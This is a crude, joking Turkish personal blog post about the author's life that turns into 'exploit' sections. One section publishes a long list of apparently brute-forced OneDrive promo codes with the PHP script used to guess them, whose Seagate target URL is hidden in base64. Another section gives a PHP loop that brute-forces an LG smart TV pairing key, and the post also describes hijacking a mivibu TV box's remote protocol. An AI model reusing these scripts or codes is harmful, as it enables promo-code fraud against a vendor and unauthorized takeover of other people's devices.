Your browser does not support JavaScript! Dr. Watson Aranıyor ~~ Burtay.Org
    Follow @burtay  
  +31-653-420-829

Dr. Watson Aranıyor

   

Oluşturma Tarihi : 20.01.2017 01:10:40
Son Güncelleme   : 20.11.2017 17:47:44



Öyle Bir Sevişelimki Komşular Bile Sigara Yaksın!

Türk Rönensansı - Rönensans vardı da biz mi içtik?
Sülüman Demirel'den alıntı ile girdik ama kendisinin Türk rönesansı ile hiç alakası yok. Eğer kendisinin dahil olduğu bir rönesans olsaydı muhtemelen harakiri yapardım. Hani rönesans vardı da biz mi fark etmedik derseniz de , evet aynen öyle diye cevaplamak zorunda kalırım.

Nerden çıktı şimdi bu mevzu öncelikle ona açıklık getireyim. Daha önceki yazılarımda kernel programcısı bir arkadaşım EGOmdan dem vurmuş ona bir cevap olarak hala fark edemediğimiz şu rönensantan bahsetmek istedim.

Katılırmısınız, bir rönesans olarak kabul eder misiniz bilmem. Ama eğer Türkiye'de bir rönesans oldu ise 90larda oldu ama kimse fark edemedi. Arabesk müziğin son zamanları, türk pop müziğinin en iyi olduğu dönemler. Tofaşların kral olduğu, almanyanın mark fransanın frank kulllandığı hatta ve hatta soner sarakabadayı'nın saçlarının olduğu kel olmadığı yarı arabesk söylediği dönemler.

Saçları olan soner sarıkabadayı , delillerle konuşuyorum gördüğünüz gibi.


En ateşli ateisti bile soner'in bu hali ile imana getiririm. Herşeyin olabileceğine inanıyor insan. Evrene boş boş mesajlar yollamayın bundan sonra aq. Taam mı?

Asıl konumuza dönelim şimdi Türk rönesansı.Arabesk muziğin baskın olduğu dönemlerde doğan, 90larda tofaş ile tanışan, enteresan ama bağımlılık yapan bir pop muziğinin yavaştan arabesk kültürünü yok ettiği dönemde ergenliklerini geçiren insanlarımız alkol, uyuşturucu kullanmasalar bile maruz kaldığı bu geçiçler ile öyle bir kafaya vardı ki ha işte kafaların batman'inin yaşadı. O insanlardan bugün çıkan şeyler bizim akılda ve fikirde çoktan rönensansı gerçekleştirdiğimizi gösteriyor buyrun bakın şimdi bunu yazan insanlar normal olabilir mi sizce.









Şimdi yukardaki satırlar aylar öncesinden yazılmış olduğundan çokda devam etmek istemiyorum, çünkü o kafayı çoktan yitirdim, şimdi ayrı bi leveldeyim. Özetle kernel programcısı arkadaşa söylemek istediğim 13 yıl değil 300 yılda kernel programcısı olsan bazı şeyleri kernel ile anlayamıyor insan yazım tarzım ego değil bir anlatım şeklidir.

Evet şimdi gelelim blog yazımıza, uzun süredir yazmıyorum. Yavru ceylanlar soruyor ne zaman yazacaksın diye ama korkuyorum lan yazmaya.En son 14 temmuzda yazdığım yazıyı, azıcık şu memlekti sevin ulan diye bitirdim 15 temmuzda adamlar darbeye kalkıştı. Ulan acaba mı diye kendi kendime sormaya başladım. Bu gerizekalılar beni yeni bir Haile Selassie falan mı belledir ne.E o kadar da değildir herhalde aq. Şimdi bişi yazarız kafamızdan aşağı nükler bomba falan yağar, ne lazım aq, rahat rahat oturuyoz işte.

Eski blog takvimini de takip etmiyorum, yazacağım dediğim şeyleride yazmaktan vazgeçtim.Uğraşamıyorum arkadaş zaman yok zaman.Geçen sherlock'un son sezonunu izledim, final hariç gayet iyi olmuştu. Izlerken baktım sherlock uçuyo kaçıyo ama blogu dr.watson yazıyo. oh aq mis gibi. Bende bi dr.watsın arıyom lan. Cidden bak, ben anlatayım otursun o yazsın. Vallahi varsa böyle bi cengaver kapımız açık.Bütün blog şifrelerini vericem. Valla vericem lan nasıl olsa blogta hiç şifre yok :) . Varsa öyle biri cidden iletişime geçsin bari adam gibi blog tutarız.

Sherlocktan girmişken benim de bir mycroft'um var. Kendisi XXX benim, z0rlu da benim, XXX-X da benim diyor. Harbiden mi derseniz, ne biliyim aq adamın kafa yarı kırık, yada %80 kırık diyelim. 3 dakka muhabbet çevirelim deriz 3 dakka içinde 8 konuda birden konuşuyoruz. Kırık aq adam kırık. Geçen aradı beni dedi buluşalım kod yazacağız algoritma sormam lazım sana. tamam dedim cumartesi gel beni al malum kar var benim Maserati karda kıyamette kullanılacak araba değil. Zenginim aq ne yapayım yani, artislik değil olum gerçek bu. Ama dedim sabah 8de evin önünde ol 3 dakka bile geç kalsan gelme bulamazsın beni. Neyse cumartesi günü oldu adam 1700 da uyanmış beni arıyor. Dedim yarın gel saat 8 de gel ama. Tamam mı gardaşım tamam. Pazar sabah 3'e kadar kod yazdım sonra yattım. Sabah 5 birisi cama taş atıyor.Yanımda ki kızlar ürktü tabi biri sağımdan sarılmış biri solumdan sarılmış. Davay davay calm down aq bi durun bakalım. Çıktım cama bizim kırık hadi aq üşüdüm çıksana diyo. Neyse aldım laptopu çıktım manyak mısın olum sen sabah 5 diyom, e ne olacak diyo. 8de gel dedim ben sana diyorum, ben 8de gelemem bu saat güzel diyo. Hayatım manyak dolu aq.

Geçen gün yine uyuyoruz manitalarla sabahın 3'ü telefon çalıyor, whatsapp araması, hani şu blogun üstünde verdiğim numara. Efendim dedim. Önce bi hırıltı sonra burtay sen misin? diye bir soru. Dedim gelirsem oraya o telefonu apandistine sokarım senin, bu sefer kapattı.Yok aq size whatsapp falan. İyice sapığa bağladınız lan.
Olum zaten manitalar bütün gün kafa ütülüyor, biri varoluşçu diğeri pragmatik. Sabaha kadar yarısını anlamadığım kelimeler içeren tartışmalar yapıyorlar kedi gibi kavga ediyorlar birde siz sapıklarla uğraşamam aq.Bende insanım lan.

Keselim lagalugayı çünkü hiç blog yazasım yok sizinde fark ettiğiniz gibi.

Konu 1 - One Drive Exploit
---------------------------
1 yıl önce harici HDD almıştım içinden 2 yıllık 200 GB onedrive alanı veren bir kod çıktı.Bende üzerinden biraz çalışma yaptım. Önemli olan şuydu kod random mu yoksa algoritmik mi? algoritmik olacağını düşünerek bi exploit yazdım ve güm. Elimde binlerce 200GB hediye alan içeren kod var. bir kısmını dağıttım diğerleri hala duruyor alın kullanın aq.

Aha bunlar kodlar

NA7SQJNS
NA7SDX5T
NA7SEB5Y
NA7S3CV0
NA7SM9ZV
NA7SKGEA
NA7SX23D
NA7SB8AM
NA7SYNE5
NA7SARY9
NA7SPZ2D
NA7S91MP
NA7SRSCP
NA7SGTCQ
NA7SLD4G
NA7SMPG0
NA7SPD4Z
NA7STDLE
NA7SNWB9
NA7S5CNS
NA7SM4YH
NA7S17JZ
NA7SWNG1
NA7S4KJR
NA7S58ZC
NA7SDC17
NA7SXSA8
NA7S7V2S
NA7SRZ2X
NA7SD3JV
NA7SCSJH
NA7SB0ZV
NA7SWANG
NA7S3EGH
NA7SR9LC
NA7SP64J
NA7SCSQP
NA7SW92X
NA7S2R4E
NA7S4B5E
NA7SHYK2
NA7SDH1V
NA7SHD7F
NA7STGW7
NA7S09ZA
NA7SDB1C
NA7SCMA6
NA7S4NP2
NA7SPJLF
NA7SW56Z
NA7S4W3G
NA7S4H3T
NA7SPK9T
NA7S7STF
NA7S4YT7
NA7S0NR7
NA7S1HPY
NA7S0K39
NA7SW4A1
NA7SMV2T
NA7SYVFW
NA7SEV4X
NA7S4W9L
NA7SAEVQ
NA7S3YAM
NA7SCNEX
NA7SQ2SL
NA7SAXJW
NA7SN4V7
NA7SFAQJ
NA7SLSHV
NA7S74VS
NA7S2ABS
NA7S9186
NA7SBY0S
NA7SATV5
NA7S1F0D
NA7SWZF4
NA7SHC93
NA7S40BX
NA7S8FWS
NA7SRN5G
NA7S0DTP
NA787TWD
NA77DR9T
NA7Y0Q86
NA7NRK0L
NA7NWZ2D
NA78X1F0
NA7YE1FZ
NA7QH7TX
NA7GY410
NA7R7G3D
NA756C29
NA736EH0
NA7K97TA
NA7NS5L3
NA731K64
NA7KJDF5
NA75NY0Z
NA78271B
NA712XNL
NA7ESRH0
NA76KC42
NA7SCWM0
NA7395JP
NA77V9PH
NA7ED5SZ
NA76HM74
NA7G23ZM
NA7D6KTH
NA7R47JD
NA77VCAD
NA7LD3QX
NA77GDRW
NA7GSAXM
NA7YAFZL
NA770B4D
NA7J03TR
NA78LXQK
NA78FALT
NA7W4A1S
NA73975M
NA7LQ3GJ
NA7SXECY
NA7N32J4
NA752D8B
NA77GCMQ
NA7LT7S6
NA7SY749
NA7DMBYZ
NA77ATZR
NA7N2WVF
NA7RPLBA
NA7LZFP6
NA7EN60D
NA7176JS
NA7SV40M
NA78BD4M
NA717W2K
NA78VD37
NA7N90VB
NA7QKY87
NA7LCSP4
NA7A03L4
NA7NXFKQ
NA7ETM94
NA7RGL3C
NA7QSMVA
NA7KJ6S4
NA7A1T2E
NA7D0W91
NA786PCQ
NA7SKCTM
NA750LYN
NA75A8F3
NA7D0MWC
NA7NY8E7
NA7QR270
NA7G54BW
NA765RZ1
NA75L79G
NA78GHCA
NA7D0PXY
NA7JZTEB
NA7F0DGP
NA7K5NA6
NA77J4XB
NA75MQHE
NA7SNFJL
NA7EJVRN
NA75FYNT
NA7DS5V6
NA761Z4M
NA77K6WT
NA7LDQZA
NA7GPWV2
NA7GA3WR
NA7NW143
NA7GWXFY
NA7WSHEA
NA78SBMQ
NA7ENHLD
NA7R8ZXY
NA7LZ6KS
NA7R2HJ1
NA7WRG09
NA7KJDG6
NA7DWH2B
NA7Y2DE7
NA7RQ51G
NA7KM0WH
NA77SFRW
NA7ER4KC
NA7WFL69
NA7LJKH2
NA7L5M2Z
NA7D42QR
NA7N26VR
NA75HPD9
NA762K1L
NA7N6PJQ
NA7R0J5Y
NA7WK43P
NA7LXN4D
NA7WL59E
NA7Q1PKX
NA7WT1YJ
NA7WN9R4
NA78ZP92
NA7QHJBG
NA7K7B9F
NA7NB8DC
NA7NHCBP
NA715KZR
NA78H0NK
NA773JZV
NA75YTQF
NA731TMR
NA7LX1HG
NA7N410C
NA7EDK4H
NA7KF7YB
NA7WP5EZ
NA7D1KEX
NA7W92LD
NA75YEPH
NA76DY51
NA7YC31J
NA7DQKZV
NA769SF7
NA75J3XF
NA7J79L0
NA7RWMCB
NA76AB7J
NA7Q7VGJ
NA7YE38B
NA7K962B
NA77QFVC
NA7GBCQX
NA7WHY4J
NA7QWDL6
NA7E5AZD
NA78NS2Y
NA790678
NA7SWH72
NA7KNT90
NA7JTPQR
NA7QF593
NA7D67QZ
NA78GJ9B
NA7Q794P
NA712NQW
NA7LHAWR
NA7QNP7L
NA7E0J69
NA7WGYLF
NA76CZV5
NA7LGTHC
NA7PAVKE
NA7F10HV
NA7N8CM3
NA7Y4283
NA7J24QW
NA751RM7
NA7P70T5
NA7WKNFZ
NA78LBT3
NA7WLFJY
NA7LYJAZ
NA7SHFE0
NA7QDC0Y
NA7Y1VS7
NA7WH4EA
NA7JNSY6
NA7N657Z
NA7P0QNZ
NA7LBQGY
NA7DFCX1
NA7RNG3S
NA7LHMNV
NA7JNMT2
NA717M58
NA7S9JRK
NA7N1RSV
NA78KAWJ
NA7WCB57
NA7JL3X4
NA774TY8
NA7JA071
NA7LEP2B
NA7P4B6C
NA7QWH26
NA76D1LK
NA7WGFB2
NA793ALJ
NA7GJS15
NA710ZAB
NA7765DV
NA7LB9GY
NA7KYFJV
NA7S5XKY
NA76GDTR
NA7KJNL3
NA77MA2T
NA7GM5PR
NA7Y1TEG
NA7RWJDZ
NA7WK3YS
NA75DVQS
NA7DCK6Q
NA78N4F7
NA7D5F48
NA7EG2A9
NA7J8BQ5
NA7S6BNC
NA7D07RP
NA76BSV5
NA7LZB5C
NA7164ZX
NA76TARZ
NA7W3Z2L
NA7WFRCD
NA7NDQJP
NA7G95N1
NA76JYQ7
NA7RXNKZ
NA78GCSJ
NA7RKADJ
NA7314TE
NA7ECYSK
NA7K7160
NA76489T
NA77DWNR
NA7KQA64
NA7WXBD5
NA7LK0ST
NA7SNK5C
NA76A2PZ
NA715Q7Y
NA7KYERM
NA7GLKMJ
NA78E7JZ
NA7GA1PZ
NA7SHJNE
NA7R526N
NA7NLWHK
NA77JTYC
NA78EHST
NA7LQ45S
NA77GYVR
NA76AR3D
NA761PK4
NA77PF2L
NA7LZPEW
NA7NDZ4B
NA7LNVQA
NA7L4NCV
NA7JLHTM
NA7K4BVY
NA7R3Q5M
NA7QBY2S
NA715JF8
NA7LS0XJ
NA7JYZP6
NA7P4GBD
NA758BZS
NA7KL5N1
NA734P9K
NA7SV57R
NA77AG3F
NA7EC684
NA77ABDL
NA730YWJ
NA7GJ9WB
NA7N8MY7
NA75K914
NA7J0X5W
NA7GMQZ9
NA782R5L
NA7RY139
NA7JNGV1
NA78JLTM
NA7EMTAW
NA75ZGBF
NA7NW1XY
NA7QE0KW
NA75ESYQ
NA75AJ7Z
NA7LNV09
NA7QXCW9
NA7L95GW
NA75S4DL
NA78L3P6
NA7KDHST
NA7WC6NT
NA7LDVXZ
NA7JV38X
NA7NEP35
NA7PCE18
NA7WXV4Y
NA7P5KTR
NA77JM8B
NA7N840Q
NA76784R
NA75Y9GJ
NA7WCVFA
NA7DBVEP
NA7EKQXA
NA7JRVH1
NA767SNY
NA734Z2T
NA7LKRPJ
NA7W9A3J
NA7L0SGA
NA7QD5SW
NA77XZV2
NA786WPR



Aha buda exploit



/*
*	One Drive Promo Code Finder
*	Coded By Burtay
*	http://www.burtay.org
*	admin[at]burtay.org
*	Twitter : @haciburtay
*/


class BurtayThreadPool extends Thread
{
	private $sinif;
	
	public function __construct($sinif)
	{
		$this->sinif = $sinif;
	}
	
	public function run()
	{		
		$this->sinif->calistir();
	}	
}


class Burtay
{
	public function __construct($threadSayisi, $sinif)
	{
		$pool  = new Pool($threadSayisi);
		$is_listesi	= array();
		for($i=1;$i<=1000;$i++)
		{
			$is_listesi[] = new burtayThreadPool($sinif);
		}
		foreach($is_listesi as $liste)
		{
			$pool->submit($liste);
		}
		$pool->shutdown();
	}
}


class oneDrive
{
	public function calistir()
	{
		$randomString = "NA7".substr(str_shuffle("0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ"), 0, 5);
		$sonuc = get_headers(base64_decode("aHR0cDovL215cG9ydGFsLnNlYWdhdGUuY29tL2NvbnN1bWVyLWlkZW50aXR5L29uZWRyaXZlP3NuPQ==").$randomString,1);
		if($sonuc["Location"][1]== base64_decode('aHR0cHM6Ly9teXBvcnRhbC5zZWFnYXRlLmNvbS9jb25zdW1lci1pZGVudGl0eS9lcnJvcnMuanNwP2Vycm9yPW9uZWRyaXZl'))
		{
			echo $randomString." Olmadi\n";			
		}
		else
		{
			echo $randomString."\n";
			$ac = fopen('oneDrive.txt','ab');
			fwrite($ac,$randomString."\n");
			fclose($ac);
		}
	}
}

$th = new Burtay(10,new oneDrive());





Konu 2 - mivibu Exploit
-----------------------
Bu mevzu baya yıllanmış bir mevzu, bütün bir janissaries ekibi, networkculer dahil üzerinde tartıştığımz ve beni ifrit ettikleri mevzu.
Geçmiş zaman ben diyim 3 siz diyin 4-5 yıl önce harbiden çok oldu hatırlamıyorum.mivibu olan bir evi ziyaret ettim ilgimi çekti kutu biraz kurcaladım tabi ki bu kurcalama ile elde ettiğim sonuçları sizinle paylaşmayacağım. Ama garip birşey vardı.mivibunun kumanda uygulamasını indirip kanal değiştirmek istediğimde çat diye kanalın değiştiğini gördüm. Bi dakka lan bi dakka manyağa bak. İnsan bi sorar aq bu sen misin diye, belki wifi şifremi verdiğim komşum değiştiriyo kanalı? sapık mısınız olum siz bu nasıl bi algoritma. Hemen uygulamayı decomple edip komutları aldım ve netbeans ile yeni bir CLI uygulama yaptım bilgisayardan kanalları değişmeye başladım, Sonra olayı büyütmek istedim local olarak değilde de remoteIP üzerinden kanalarrı değişmek istedim ama başaramadım.Port forwarding yapmadım tabiki o zaman manası kalmaz. Amaç ülke çabında mivibu izleyenlerin kanallarının değiştirebilmesnin münkün olup olmadğını görmek port forwarding nedir yavrum.Niyetim Modeme telnet ile bağlanıp tcpdump kurmak ardından müşteri hizmetleri arayıp call center protokol portundan gelen veriyi takip edip direk erişim için gerekli olan datayı elde etmekti. Sonra düşündüm ben bu modeme kurulum yapayım derken kesin firmware uçar ondan sonra anlat dur derdini vazgeçtim öylece kaldı.

Peki burdaki sıkıntı ne derseniz özetle kumanda uygulaması mivibu kutusuna ilk erişim sağladığında random bir key üreterek o uygulama girilmesi talep etmesi gerekiyordu.Televizyonda görüntülenen pairing key uygulamaya girildiğinde ise mivibu kutusunda o cihaz için bir session üretilmesi gerekmekteydi.Daha da özetle Pairing Key kardeşim işte.



Konu 3 - SmartTV pairing Key Brute Forcing
-------------------------------------------
Peki pairing key'i nasıl buluruz? bana sorarsanız en basit yolu brute force çünkü zaten topu topu 4-6 haneli bir rakam.Localden brute force yaparsanız bir kaç dakika içinde cihazının paring key'ini bulabiliriz.öncelikle LG televizyonlarda pairing key nasıl çalışır şu güzel balık etli ablanın anlatımı ile izleyelm.



Evet şimdide LG televizyon için kodlamış olduğum brute forcer'a bi bakalım. Bunun için ayrı bir class gerekmekte githubdan bulabilirsiniz

session_start();

include 'smartTV.php';
$tv = new SmartTV('192.168.1.2');

for($i=100000;$i<999999;$i++)
{
	echo "[+]Trying ".$i;
	$tv->setPairingKey($i); // $tv->displayPairingKey();
	try 
	{
		$_SESSION['SESSION_ID'] = $tv->authenticate();
		
	} 
	catch (Exception $e) 
	{
		echo(" Authentication failed, I am sorry.\n");
	}
	if($_SESSION['SESSION_ID'] != "")
	{
		die("\n\n[+]Found Pairing Key ".$i);
	}
}


evet şimdide localden LG TV'imizin ip adresini bulup nasıl pairing Key'i elde edebiliriz izleyelim.







Pairing Code artık bulunmuştur, iyi eğlenceler :)





Konu 4 - RFID-NFC Card Copy
----------------------------
Şimdi bu konuyu ve 5-6-7'yi yazmaya üşeniyorum. gönüllü bir Dr.watson çıkarsa yazarız. yoksa yok yeni yazı falan aq. hadi öptüm